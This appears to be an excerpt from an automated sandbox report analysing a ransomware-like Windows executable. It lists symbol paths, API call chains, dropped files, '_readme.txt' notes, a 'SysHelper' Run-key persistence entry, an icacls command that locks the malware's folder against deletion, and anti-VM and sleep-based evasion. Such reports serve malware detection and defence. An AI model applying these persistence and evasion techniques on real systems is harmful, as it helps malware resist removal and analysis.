3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022014265.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275835026.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022446710.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046429413.0000000003321000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1957412867.0000000003770000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2015348604.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017889756.0000000003336000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbvb8IC source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298200756.000000000383A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307758471.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297500931.0000000003829000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306454387.00000000038CC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299485751.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299340114.0000000003840000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307467722.00000000038D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\T source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003B02000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307527322.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306204411.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307814627.0000000003B11000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275138437.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276086139.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251930708.0000000003335000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275446209.00000000038BC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275255859.0000000003339000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251930708.0000000003335000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275255859.0000000003339000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\O\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274518073.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274719064.00000000037C3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251480244.0000000003361000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046044060.0000000003378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360903093.0000000003AED000.00000004.00000020.00020000.00000000.sdmp
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_00472220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00472220
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_00488565 push ecx; ret 0_2_00488578
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 2_2_00488565 push ecx; ret 2_2_00488578
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 3_2_00E58565 push ecx; ret 3_2_00E58578
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 4_2_00E58565 push ecx; ret 4_2_00E58578

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File created: C:\Users\user\AppData\Local\Temp\wctF86A.tmp
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.ppvw (copy)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File created: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File created: C:\Users\user\Local Settings\Temp\wct3D66.tmp.ppvw (copy)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File created: C:\Users\user\AppData\Local\Temp\wct3D66.tmp
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File created: C:\_readme.txt
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File created: C:\$WinREAgent\_readme.txt
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File created: C:\$WinREAgent\Scratch\_readme.txt
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File created: C:\Users\user\_readme.txt
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_004E1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_004E1920
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Stalling execution: Execution stalls by calling Sleep graph_2-41502
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Stalling execution: Execution stalls by calling Sleep graph_3-40936
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_00461178 rdtsc 0_2_00461178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 2_2_004E1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_004E1920
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,0_2_0046E670
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0046E670
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,3_2_00E3E670
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,4_2_00E3E670
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Thread delayed: delay time: 1100000
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmp
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.ppvw (copy)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct3D66.tmp.ppvw (copy)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct3D66.tmp
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Evaded block: after key decision
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-38462
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe API coverage: 6.0 %
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe TID: 8140 Thread sleep time: -1100000s >= -30000s
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe TID: 7680 Thread sleep count: 160 > 30
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_00470160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00470160
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_0046F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_0046F730
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_0046FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_0046FB98
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 2_2_0046F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0046F730
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 2_2_00470160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00470160
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 2_2_0046FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0046FB98
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 3_2_00E3F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E3F730
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 3_2_00E40160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E40160
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 3_2_00E3FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00E3FB98
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 4_2_00E40160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E40160
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 4_2_00E3F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E3F730
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 4_2_00E3FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,4_2_00E3FB98
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840014089.00000000016D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0rv
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1956219802.0000000003772000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
